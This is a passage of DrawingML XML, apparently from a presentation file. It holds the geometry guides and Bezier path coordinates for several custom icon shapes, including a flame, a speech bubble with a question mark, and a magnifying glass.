                    <a:pt x="105" y="137"/>
                    <a:pt x="108" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="140"/>
                    <a:pt x="119" y="141"/>
                    <a:pt x="121" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="141"/>
                    <a:pt x="130" y="139"/>
                    <a:pt x="136" y="13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2" y="156"/>
                    <a:pt x="138" y="157"/>
                    <a:pt x="135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F732CE0-61F3-4C6D-940C-7A31B6E57E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59057" y="157214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027B9E20-0EB8-4DCA-8BD7-B6DD255532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7877841">
              <a:off x="721579" y="4124487"/>
              <a:ext cx="563825" cy="417088"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 163 w 268"/>
                <a:gd name="T1" fmla="*/ 36 h 198"/>
                <a:gd name="T2" fmla="*/ 151 w 268"/>
                <a:gd name="T3" fmla="*/ 87 h 198"/>
                <a:gd name="T4" fmla="*/ 146 w 268"/>
                <a:gd name="T5" fmla="*/ 0 h 198"/>
                <a:gd name="T6" fmla="*/ 97 w 268"/>
                <a:gd name="T7" fmla="*/ 32 h 198"/>
                <a:gd name="T8" fmla="*/ 82 w 268"/>
                <a:gd name="T9" fmla="*/ 105 h 198"/>
                <a:gd name="T10" fmla="*/ 73 w 268"/>
                <a:gd name="T11" fmla="*/ 63 h 198"/>
                <a:gd name="T12" fmla="*/ 138 w 268"/>
                <a:gd name="T13" fmla="*/ 198 h 198"/>
                <a:gd name="T14" fmla="*/ 163 w 268"/>
                <a:gd name="T15" fmla="*/ 36 h 198"/>
                <a:gd name="T16" fmla="*/ 116 w 268"/>
                <a:gd name="T17" fmla="*/ 168 h 198"/>
                <a:gd name="T18" fmla="*/ 103 w 268"/>
                <a:gd name="T19" fmla="*/ 168 h 198"/>
                <a:gd name="T20" fmla="*/ 103 w 268"/>
                <a:gd name="T21" fmla="*/ 144 h 198"/>
                <a:gd name="T22" fmla="*/ 87 w 268"/>
                <a:gd name="T23" fmla="*/ 144 h 198"/>
                <a:gd name="T24" fmla="*/ 87 w 268"/>
                <a:gd name="T25" fmla="*/ 168 h 198"/>
                <a:gd name="T26" fmla="*/ 75 w 268"/>
                <a:gd name="T27" fmla="*/ 168 h 198"/>
                <a:gd name="T28" fmla="*/ 75 w 268"/>
                <a:gd name="T29" fmla="*/ 115 h 198"/>
                <a:gd name="T30" fmla="*/ 87 w 268"/>
                <a:gd name="T31" fmla="*/ 115 h 198"/>
                <a:gd name="T32" fmla="*/ 87 w 268"/>
                <a:gd name="T33" fmla="*/ 136 h 198"/>
                <a:gd name="T34" fmla="*/ 103 w 268"/>
                <a:gd name="T35" fmla="*/ 136 h 198"/>
                <a:gd name="T36" fmla="*/ 103 w 268"/>
                <a:gd name="T37" fmla="*/ 115 h 198"/>
                <a:gd name="T38" fmla="*/ 116 w 268"/>
                <a:gd name="T39" fmla="*/ 115 h 198"/>
                <a:gd name="T40" fmla="*/ 116 w 268"/>
                <a:gd name="T41" fmla="*/ 168 h 198"/>
                <a:gd name="T42" fmla="*/ 158 w 268"/>
                <a:gd name="T43" fmla="*/ 160 h 198"/>
                <a:gd name="T44" fmla="*/ 141 w 268"/>
                <a:gd name="T45" fmla="*/ 166 h 198"/>
                <a:gd name="T46" fmla="*/ 124 w 268"/>
                <a:gd name="T47" fmla="*/ 159 h 198"/>
                <a:gd name="T48" fmla="*/ 118 w 268"/>
                <a:gd name="T49" fmla="*/ 141 h 198"/>
                <a:gd name="T50" fmla="*/ 124 w 268"/>
                <a:gd name="T51" fmla="*/ 123 h 198"/>
                <a:gd name="T52" fmla="*/ 141 w 268"/>
                <a:gd name="T53" fmla="*/ 117 h 198"/>
                <a:gd name="T54" fmla="*/ 158 w 268"/>
                <a:gd name="T55" fmla="*/ 123 h 198"/>
                <a:gd name="T56" fmla="*/ 164 w 268"/>
                <a:gd name="T57" fmla="*/ 141 h 198"/>
                <a:gd name="T58" fmla="*/ 158 w 268"/>
                <a:gd name="T59" fmla="*/ 160 h 198"/>
                <a:gd name="T60" fmla="*/ 187 w 268"/>
                <a:gd name="T61" fmla="*/ 128 h 198"/>
                <a:gd name="T62" fmla="*/ 187 w 268"/>
                <a:gd name="T63" fmla="*/ 168 h 198"/>
                <a:gd name="T64" fmla="*/ 175 w 268"/>
                <a:gd name="T65" fmla="*/ 168 h 198"/>
                <a:gd name="T66" fmla="*/ 175 w 268"/>
                <a:gd name="T67" fmla="*/ 128 h 198"/>
                <a:gd name="T68" fmla="*/ 161 w 268"/>
                <a:gd name="T69" fmla="*/ 128 h 198"/>
                <a:gd name="T70" fmla="*/ 161 w 268"/>
                <a:gd name="T71" fmla="*/ 115 h 198"/>
                <a:gd name="T72" fmla="*/ 201 w 268"/>
                <a:gd name="T73" fmla="*/ 115 h 198"/>
                <a:gd name="T74" fmla="*/ 201 w 268"/>
                <a:gd name="T75" fmla="*/ 128 h 198"/>
                <a:gd name="T76" fmla="*/ 187 w 268"/>
                <a:gd name="T77" fmla="*/ 128 h 198"/>
                <a:gd name="T78" fmla="*/ 148 w 268"/>
                <a:gd name="T79" fmla="*/ 129 h 198"/>
                <a:gd name="T80" fmla="*/ 145 w 268"/>
                <a:gd name="T81" fmla="*/ 127 h 198"/>
                <a:gd name="T82" fmla="*/ 141 w 268"/>
                <a:gd name="T83" fmla="*/ 126 h 198"/>
                <a:gd name="T84" fmla="*/ 137 w 268"/>
                <a:gd name="T85" fmla="*/ 126 h 198"/>
                <a:gd name="T86" fmla="*/ 133 w 268"/>
                <a:gd name="T87" fmla="*/ 129 h 198"/>
                <a:gd name="T88" fmla="*/ 131 w 268"/>
                <a:gd name="T89" fmla="*/ 134 h 198"/>
                <a:gd name="T90" fmla="*/ 130 w 268"/>
                <a:gd name="T91" fmla="*/ 141 h 198"/>
                <a:gd name="T92" fmla="*/ 131 w 268"/>
                <a:gd name="T93" fmla="*/ 149 h 198"/>
                <a:gd name="T94" fmla="*/ 133 w 268"/>
                <a:gd name="T95" fmla="*/ 153 h 198"/>
                <a:gd name="T96" fmla="*/ 137 w 268"/>
                <a:gd name="T97" fmla="*/ 156 h 198"/>
                <a:gd name="T98" fmla="*/ 141 w 268"/>
                <a:gd name="T99" fmla="*/ 157 h 198"/>
                <a:gd name="T100" fmla="*/ 145 w 268"/>
                <a:gd name="T101" fmla="*/ 156 h 198"/>
                <a:gd name="T102" fmla="*/ 148 w 268"/>
                <a:gd name="T103" fmla="*/ 153 h 198"/>
                <a:gd name="T104" fmla="*/ 151 w 268"/>
                <a:gd name="T105" fmla="*/ 149 h 198"/>
                <a:gd name="T106" fmla="*/ 151 w 268"/>
                <a:gd name="T107" fmla="*/ 141 h 198"/>
                <a:gd name="T108" fmla="*/ 151 w 268"/>
                <a:gd name="T109" fmla="*/ 134 h 198"/>
                <a:gd name="T110" fmla="*/ 148 w 268"/>
                <a:gd name="T111" fmla="*/ 12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98">
                  <a:moveTo>
                    <a:pt x="163" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="83"/>
                    <a:pt x="155" y="87"/>
                    <a:pt x="151" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="88"/>
                    <a:pt x="138" y="4"/>
                    <a:pt x="146" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="97" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="66"/>
                    <a:pt x="106" y="98"/>
                    <a:pt x="82" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="113"/>
                    <a:pt x="71" y="71"/>
                    <a:pt x="73" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="62"/>
                    <a:pt x="0" y="198"/>
                    <a:pt x="138" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="198"/>
                    <a:pt x="204" y="38"/>
                    <a:pt x="163" y="36"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="168"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="168"/>
                    <a:pt x="103" y="168"/>
                    <a:pt x="103" y="168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6" y="115"/>
                    <a:pt x="116" y="115"/>
                    <a:pt x="116" y="115"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="168"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="158" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="164"/>
                    <a:pt x="148" y="166"/>
                    <a:pt x="141" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="166"/>
                    <a:pt x="128" y="164"/>
                    <a:pt x="124" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="155"/>
                    <a:pt x="118" y="149"/>
                    <a:pt x="118" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="134"/>
                    <a:pt x="120" y="128"/>
                    <a:pt x="124" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="119"/>
                    <a:pt x="134" y="117"/>
                    <a:pt x="141" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="117"/>
                    <a:pt x="154" y="119"/>
                    <a:pt x="158" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="128"/>
                    <a:pt x="164" y="134"/>
                    <a:pt x="164" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="149"/>
                    <a:pt x="162" y="155"/>
                    <a:pt x="158" y="160"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="187" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="168"/>
                    <a:pt x="187" y="168"/>
                    <a:pt x="187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28"/>
                    <a:pt x="201" y="128"/>
                    <a:pt x="201" y="128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="187" y="128"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="128"/>
                    <a:pt x="146" y="127"/>
                    <a:pt x="145" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="126"/>
                    <a:pt x="142" y="126"/>
                    <a:pt x="141" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="126"/>
                    <a:pt x="138" y="126"/>
                    <a:pt x="137" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="127"/>
                    <a:pt x="135" y="128"/>
                    <a:pt x="133" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="130"/>
                    <a:pt x="132" y="132"/>
                    <a:pt x="131" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="136"/>
                    <a:pt x="130" y="139"/>
                    <a:pt x="130" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="144"/>
                    <a:pt x="130" y="147"/>
                    <a:pt x="131" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="151"/>
                    <a:pt x="132" y="152"/>
                    <a:pt x="133" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="155"/>
                    <a:pt x="136" y="156"/>
                    <a:pt x="137" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="157"/>
                    <a:pt x="139" y="157"/>
                    <a:pt x="141" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="157"/>
                    <a:pt x="144" y="157"/>
                    <a:pt x="145" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="156"/>
                    <a:pt x="147" y="155"/>
                    <a:pt x="148" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="152"/>
                    <a:pt x="150" y="150"/>
                    <a:pt x="151" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="147"/>
                    <a:pt x="151" y="144"/>
                    <a:pt x="151" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="139"/>
                    <a:pt x="151" y="136"/>
                    <a:pt x="151" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="132"/>
                    <a:pt x="149" y="131"/>
                    <a:pt x="148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CF25DF52-FCBF-4CCA-9560-1D72BE0029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9761" y="615610"/>
              <a:ext cx="1016159" cy="1016158"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 104 w 198"/>
                <a:gd name="T1" fmla="*/ 187 h 198"/>
                <a:gd name="T2" fmla="*/ 68 w 198"/>
                <a:gd name="T3" fmla="*/ 179 h 198"/>
                <a:gd name="T4" fmla="*/ 0 w 198"/>
                <a:gd name="T5" fmla="*/ 198 h 198"/>
                <a:gd name="T6" fmla="*/ 31 w 198"/>
                <a:gd name="T7" fmla="*/ 152 h 198"/>
                <a:gd name="T8" fmla="*/ 11 w 198"/>
                <a:gd name="T9" fmla="*/ 93 h 198"/>
                <a:gd name="T10" fmla="*/ 104 w 198"/>
                <a:gd name="T11" fmla="*/ 0 h 198"/>
                <a:gd name="T12" fmla="*/ 198 w 198"/>
                <a:gd name="T13" fmla="*/ 93 h 198"/>
                <a:gd name="T14" fmla="*/ 104 w 198"/>
                <a:gd name="T15" fmla="*/ 187 h 198"/>
                <a:gd name="T16" fmla="*/ 76 w 198"/>
                <a:gd name="T17" fmla="*/ 137 h 198"/>
                <a:gd name="T18" fmla="*/ 89 w 198"/>
                <a:gd name="T19" fmla="*/ 151 h 198"/>
                <a:gd name="T20" fmla="*/ 106 w 198"/>
                <a:gd name="T21" fmla="*/ 134 h 198"/>
                <a:gd name="T22" fmla="*/ 92 w 198"/>
                <a:gd name="T23" fmla="*/ 120 h 198"/>
                <a:gd name="T24" fmla="*/ 76 w 198"/>
                <a:gd name="T25" fmla="*/ 137 h 198"/>
                <a:gd name="T26" fmla="*/ 109 w 198"/>
                <a:gd name="T27" fmla="*/ 33 h 198"/>
                <a:gd name="T28" fmla="*/ 81 w 198"/>
                <a:gd name="T29" fmla="*/ 40 h 198"/>
                <a:gd name="T30" fmla="*/ 84 w 198"/>
                <a:gd name="T31" fmla="*/ 57 h 198"/>
                <a:gd name="T32" fmla="*/ 102 w 198"/>
                <a:gd name="T33" fmla="*/ 53 h 198"/>
                <a:gd name="T34" fmla="*/ 112 w 198"/>
                <a:gd name="T35" fmla="*/ 61 h 198"/>
                <a:gd name="T36" fmla="*/ 99 w 198"/>
                <a:gd name="T37" fmla="*/ 79 h 198"/>
                <a:gd name="T38" fmla="*/ 83 w 198"/>
                <a:gd name="T39" fmla="*/ 107 h 198"/>
                <a:gd name="T40" fmla="*/ 83 w 198"/>
                <a:gd name="T41" fmla="*/ 112 h 198"/>
                <a:gd name="T42" fmla="*/ 106 w 198"/>
                <a:gd name="T43" fmla="*/ 112 h 198"/>
                <a:gd name="T44" fmla="*/ 107 w 198"/>
                <a:gd name="T45" fmla="*/ 108 h 198"/>
                <a:gd name="T46" fmla="*/ 119 w 198"/>
                <a:gd name="T47" fmla="*/ 88 h 198"/>
                <a:gd name="T48" fmla="*/ 137 w 198"/>
                <a:gd name="T49" fmla="*/ 56 h 198"/>
                <a:gd name="T50" fmla="*/ 109 w 198"/>
                <a:gd name="T51" fmla="*/ 3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98">
                  <a:moveTo>
                    <a:pt x="104" y="187"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="187"/>
                    <a:pt x="79" y="184"/>
                    <a:pt x="68" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="198"/>
                    <a:pt x="0" y="198"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="198"/>
                    <a:pt x="22" y="183"/>
                    <a:pt x="31" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="136"/>
                    <a:pt x="11" y="115"/>
                    <a:pt x="11" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="42"/>
                    <a:pt x="53" y="0"/>
                    <a:pt x="104" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="0"/>
                    <a:pt x="198" y="42"/>
                    <a:pt x="198" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="145"/>
                    <a:pt x="156" y="187"/>
                    <a:pt x="104" y="187"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="145"/>
                    <a:pt x="81" y="151"/>
                    <a:pt x="89" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="151"/>
                    <a:pt x="106" y="144"/>
                    <a:pt x="106" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="126"/>
                    <a:pt x="100" y="120"/>
                    <a:pt x="92" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="120"/>
                    <a:pt x="76" y="128"/>
                    <a:pt x="76" y="137"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="33"/>
                    <a:pt x="87" y="37"/>
                    <a:pt x="81" y="4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9" y="54"/>
                    <a:pt x="95" y="53"/>
                    <a:pt x="102" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="53"/>
                    <a:pt x="112" y="56"/>
                    <a:pt x="112" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="67"/>
                    <a:pt x="105" y="72"/>
                    <a:pt x="99" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="89"/>
                    <a:pt x="85" y="98"/>
                    <a:pt x="83" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="109"/>
                    <a:pt x="83" y="110"/>
                    <a:pt x="83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0"/>
                    <a:pt x="107" y="109"/>
                    <a:pt x="107" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="100"/>
                    <a:pt x="112" y="94"/>
                    <a:pt x="119" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="78"/>
                    <a:pt x="137" y="69"/>
                    <a:pt x="137" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="42"/>
                    <a:pt x="126" y="33"/>
                    <a:pt x="109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1AA544EF-4D63-406B-A6BE-B3376BCF3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4979" y="2269146"/>
              <a:ext cx="1136121" cy="1131094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1D5EB7D6-421E-4A73-99A3-12EC220A0E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917578">
              <a:off x="3958060" y="4847123"/>
              <a:ext cx="1121507" cy="1128650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 199"/>
                <a:gd name="T1" fmla="*/ 74 h 200"/>
                <a:gd name="T2" fmla="*/ 6 w 199"/>
                <a:gd name="T3" fmla="*/ 103 h 200"/>
                <a:gd name="T4" fmla="*/ 21 w 199"/>
                <a:gd name="T5" fmla="*/ 127 h 200"/>
                <a:gd name="T6" fmla="*/ 45 w 199"/>
                <a:gd name="T7" fmla="*/ 143 h 200"/>
                <a:gd name="T8" fmla="*/ 74 w 199"/>
                <a:gd name="T9" fmla="*/ 149 h 200"/>
                <a:gd name="T10" fmla="*/ 97 w 199"/>
                <a:gd name="T11" fmla="*/ 145 h 200"/>
                <a:gd name="T12" fmla="*/ 117 w 199"/>
                <a:gd name="T13" fmla="*/ 135 h 200"/>
                <a:gd name="T14" fmla="*/ 181 w 199"/>
                <a:gd name="T15" fmla="*/ 200 h 200"/>
                <a:gd name="T16" fmla="*/ 192 w 199"/>
                <a:gd name="T17" fmla="*/ 194 h 200"/>
                <a:gd name="T18" fmla="*/ 199 w 199"/>
                <a:gd name="T19" fmla="*/ 181 h 200"/>
                <a:gd name="T20" fmla="*/ 135 w 199"/>
                <a:gd name="T21" fmla="*/ 117 h 200"/>
                <a:gd name="T22" fmla="*/ 145 w 199"/>
                <a:gd name="T23" fmla="*/ 97 h 200"/>
                <a:gd name="T24" fmla="*/ 149 w 199"/>
                <a:gd name="T25" fmla="*/ 74 h 200"/>
                <a:gd name="T26" fmla="*/ 143 w 199"/>
                <a:gd name="T27" fmla="*/ 45 h 200"/>
                <a:gd name="T28" fmla="*/ 127 w 199"/>
                <a:gd name="T29" fmla="*/ 22 h 200"/>
                <a:gd name="T30" fmla="*/ 103 w 199"/>
                <a:gd name="T31" fmla="*/ 6 h 200"/>
                <a:gd name="T32" fmla="*/ 74 w 199"/>
                <a:gd name="T33" fmla="*/ 0 h 200"/>
                <a:gd name="T34" fmla="*/ 45 w 199"/>
                <a:gd name="T35" fmla="*/ 6 h 200"/>
                <a:gd name="T36" fmla="*/ 21 w 199"/>
                <a:gd name="T37" fmla="*/ 22 h 200"/>
                <a:gd name="T38" fmla="*/ 6 w 199"/>
                <a:gd name="T39" fmla="*/ 45 h 200"/>
                <a:gd name="T40" fmla="*/ 0 w 199"/>
                <a:gd name="T41" fmla="*/ 74 h 200"/>
                <a:gd name="T42" fmla="*/ 22 w 199"/>
                <a:gd name="T43" fmla="*/ 74 h 200"/>
                <a:gd name="T44" fmla="*/ 26 w 199"/>
                <a:gd name="T45" fmla="*/ 54 h 200"/>
                <a:gd name="T46" fmla="*/ 37 w 199"/>
                <a:gd name="T47" fmla="*/ 37 h 200"/>
                <a:gd name="T48" fmla="*/ 54 w 199"/>
                <a:gd name="T49" fmla="*/ 26 h 200"/>
                <a:gd name="T50" fmla="*/ 74 w 199"/>
                <a:gd name="T51" fmla="*/ 22 h 200"/>
                <a:gd name="T52" fmla="*/ 95 w 199"/>
                <a:gd name="T53" fmla="*/ 26 h 200"/>
                <a:gd name="T54" fmla="*/ 111 w 199"/>
                <a:gd name="T55" fmla="*/ 37 h 200"/>
                <a:gd name="T56" fmla="*/ 123 w 199"/>
                <a:gd name="T57" fmla="*/ 54 h 200"/>
                <a:gd name="T58" fmla="*/ 127 w 199"/>
                <a:gd name="T59" fmla="*/ 74 h 200"/>
                <a:gd name="T60" fmla="*/ 123 w 199"/>
                <a:gd name="T61" fmla="*/ 95 h 200"/>
                <a:gd name="T62" fmla="*/ 111 w 199"/>
                <a:gd name="T63" fmla="*/ 112 h 200"/>
                <a:gd name="T64" fmla="*/ 95 w 199"/>
                <a:gd name="T65" fmla="*/ 123 h 200"/>
                <a:gd name="T66" fmla="*/ 74 w 199"/>
                <a:gd name="T67" fmla="*/ 127 h 200"/>
                <a:gd name="T68" fmla="*/ 54 w 199"/>
                <a:gd name="T69" fmla="*/ 123 h 200"/>
                <a:gd name="T70" fmla="*/ 37 w 199"/>
                <a:gd name="T71" fmla="*/ 112 h 200"/>
                <a:gd name="T72" fmla="*/ 26 w 199"/>
                <a:gd name="T73" fmla="*/ 95 h 200"/>
                <a:gd name="T74" fmla="*/ 22 w 199"/>
                <a:gd name="T75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200">
                  <a:moveTo>
                    <a:pt x="0" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="85"/>
                    <a:pt x="2" y="94"/>
                    <a:pt x="6" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="112"/>
                    <a:pt x="15" y="120"/>
                    <a:pt x="21" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="134"/>
                    <a:pt x="36" y="139"/>
                    <a:pt x="45" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="147"/>
                    <a:pt x="64" y="149"/>
                    <a:pt x="74" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="149"/>
                    <a:pt x="90" y="148"/>
                    <a:pt x="97" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="143"/>
                    <a:pt x="111" y="140"/>
                    <a:pt x="117" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="200"/>
                    <a:pt x="181" y="200"/>
                    <a:pt x="181" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="199"/>
                    <a:pt x="189" y="197"/>
                    <a:pt x="192" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="191"/>
                    <a:pt x="198" y="186"/>
                    <a:pt x="199" y="18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9" y="111"/>
                    <a:pt x="143" y="104"/>
                    <a:pt x="145" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="90"/>
                    <a:pt x="149" y="82"/>
                    <a:pt x="149" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="64"/>
                    <a:pt x="147" y="55"/>
                    <a:pt x="143" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="36"/>
                    <a:pt x="133" y="29"/>
                    <a:pt x="127" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="15"/>
                    <a:pt x="112" y="10"/>
                    <a:pt x="103" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="2"/>
                    <a:pt x="84" y="0"/>
                    <a:pt x="74" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="54" y="2"/>
                    <a:pt x="45" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="10"/>
                    <a:pt x="28" y="15"/>
                    <a:pt x="21" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="29"/>
                    <a:pt x="9" y="36"/>
                    <a:pt x="6" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="55"/>
                    <a:pt x="0" y="64"/>
                    <a:pt x="0" y="74"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="22" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="67"/>
                    <a:pt x="23" y="60"/>
                    <a:pt x="26" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="48"/>
                    <a:pt x="32" y="42"/>
                    <a:pt x="37" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="32"/>
                    <a:pt x="47" y="29"/>
                    <a:pt x="54" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="23"/>
                    <a:pt x="67" y="22"/>
                    <a:pt x="74" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="22"/>
                    <a:pt x="88" y="23"/>
                    <a:pt x="95" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="29"/>
                    <a:pt x="107" y="32"/>
                    <a:pt x="111" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="42"/>
                    <a:pt x="120" y="48"/>
                    <a:pt x="123" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="60"/>
                    <a:pt x="127" y="67"/>
                    <a:pt x="127" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="82"/>
                    <a:pt x="125" y="89"/>
                    <a:pt x="123" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="101"/>
                    <a:pt x="116" y="107"/>
                    <a:pt x="111" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="116"/>
                    <a:pt x="101" y="120"/>
                    <a:pt x="95" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="126"/>
                    <a:pt x="81" y="127"/>
                    <a:pt x="74" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="127"/>
                    <a:pt x="60" y="126"/>
                    <a:pt x="54" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="120"/>
                    <a:pt x="42" y="116"/>
                    <a:pt x="37" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="107"/>
                    <a:pt x="28" y="101"/>
